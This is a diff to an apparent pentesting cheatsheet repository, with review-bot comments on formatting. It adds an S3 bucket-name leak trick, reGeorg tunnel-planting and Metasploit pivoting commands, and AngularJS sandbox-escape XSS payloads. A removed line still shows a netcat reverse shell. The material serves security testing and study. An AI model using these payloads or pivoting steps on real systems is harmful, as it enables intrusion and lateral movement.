diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md
index 13d257a..53e27d1 100644
--- a/AWS Amazon Bucket S3/README.md
+++ b/AWS Amazon Bucket S3/README.md
@@ -36,6 +36,14 @@ Their names are also listed if the listing is enabled.
adobe-REDACTED-REDACTED-REDACTED
```
+Alternatively you can extract the name of inside-site s3 bucket with `%C0`. (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
+
+```xml
+http://example.com/resources/id%C0
+
+eg: http://redacted/avatar/123%C0
+```
+
## Basic test - Listing the files
```bash
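Review bot: the added sentence "extract the name of inside-site s3 bucket with `%C0`" does not say what the reader should look for in the response or where the bucket name appears, so the README alone does not explain the trick. Add one sentence describing the expected output and reword "inside-site s3 bucket" (for example "the S3 bucket backing a resource of the site"). The fence is tagged `xml` but holds two plain URLs, and the "eg:" label belongs in the prose, not in the block.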
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index d49e426..be5a125 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
@@ -59,8 +59,38 @@ Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
+Drop one of the following files on the server:
+
+- tunnel.ashx
+- tunnel.aspx
+- tunnel.js
+- tunnel.jsp
+- tunnel.nosocket.php
+- tunnel.php
+- tunnel.tomcat.5.jsp
+
```python
-python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
+python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
+
+optional arguments:
+ -h, --help show this help message and exit
+ -l , --listen-on The default listening address
+ -p , --listen-port The default listening port
+ -r , --read-buff Local read buffer, max data to be sent per POST
+ -u , --url The url containing the tunnel script
+ -v , --verbose Verbose output[INFO|DEBUG]
+```
+
+## Metasploit
+
+```c
+portfwd list
+portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
+
+or
+
+run autoroute -s 192.168.57.0/24
+use auxiliary/server/socks4a
```
## Rpivot
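Review bot: the new list tells the reader to drop one of the `tunnel.*` files, but the command right after it still points `-u` at `http://compromised.host/shell.jsp`; use a name from the list (e.g. `tunnel.jsp`) so the two agree. The usage text pasted into the same fence has lost its metavariables (`-l , --listen-on`). Both new fences carry the wrong language tag: `python` for a shell command plus help output, and `c` for Metasploit console commands. Split the command from the help output, and move the bare "or" out of the second block into prose between two blocks.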
@@ -140,4 +170,5 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
-* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
\ No newline at end of file
+* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
+* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
\ No newline at end of file
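Review bot: the new `Pivoting Meterpreter` entry has no author or site name, while every entry above it ends with one (`- Bit rot`, `- Jeff McJunkin`, `- Mar 23, 2017 - Artem Kondratenko`); add the attribution for consistency. The file also still ends without a trailing newline (`\ No newline at end of file` on the new side), which is why the previous last line shows up as changed here; ending the file with a newline avoids that churn on the next addition.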
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 44248b8..cd8423f 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -153,6 +153,10 @@ or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
+
+or
+
+https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
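Review bot: the added `https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py` line sits inside the code fence after "or", so it reads as a third snippet rather than a reference, and nothing says what the script is. Move it outside the fence as a named Markdown link with a one-line description, and consider linking a fixed commit instead of `blob/master` so the reference does not drift.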
diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md
index adfb754..85c1076 100644
--- a/XSS injection/XSS in Angular.md
+++ b/XSS injection/XSS in Angular.md
@@ -1,5 +1,13 @@
# XSS in Angular
+> Angular as of version 1.6 have removed the sandbox altogether
+
+Angular 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
+
+```javascript
+{{constructor.constructor('alert(1)')()}}
+```
+
Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
```javascript
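Review bot: grammar in the new blockquote: "Angular as of version 1.6 have removed the sandbox altogether" should read "has removed". Since it is formatted as a quote, it also needs a source. The `Mario Heiderich` attribution links to the `cure53berlin` profile rather than to a specific post, unlike the `@brutelogic` line below it, which links to a status; link the original reference if there is one.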
@@ -8,7 +16,7 @@ Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/103153474608
Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D)
-Angular 1.6.0 [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
+Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
```javascript
{{0[a='constructor'][a]('alert(1)')()}}
@@ -16,7 +24,7 @@ Angular 1.6.0 [@LewisArdern](https://twitter.com/LewisArdern/status/105588761961
{{$on.constructor('alert(1)')()}}
```
-Angular 1.5.9
+Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
```javascript
{{
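Review bot: the heading now claims the range `1.5.9 - 1.5.11`, but the attribution links only to the `tehjh` profile, so a reader has nothing to check the widened range against. Link the post or write-up that the payload and the version range come from.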
@@ -139,4 +147,8 @@ Vue JS
```javascript
{{constructor.constructor('alert(1)')()}}
-```
\ No newline at end of file
+```
+
+## Thanks
+
+- [](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
\ No newline at end of file
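Review bot: the only entry under the new `## Thanks` heading is `[](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)` with empty link text, which renders as an invisible link. Give it a title (the URL slug suggests "XSS without HTML: Client-Side Template Injection with AngularJS"). Also add a trailing newline, since the new side still ends with `\ No newline at end of file`.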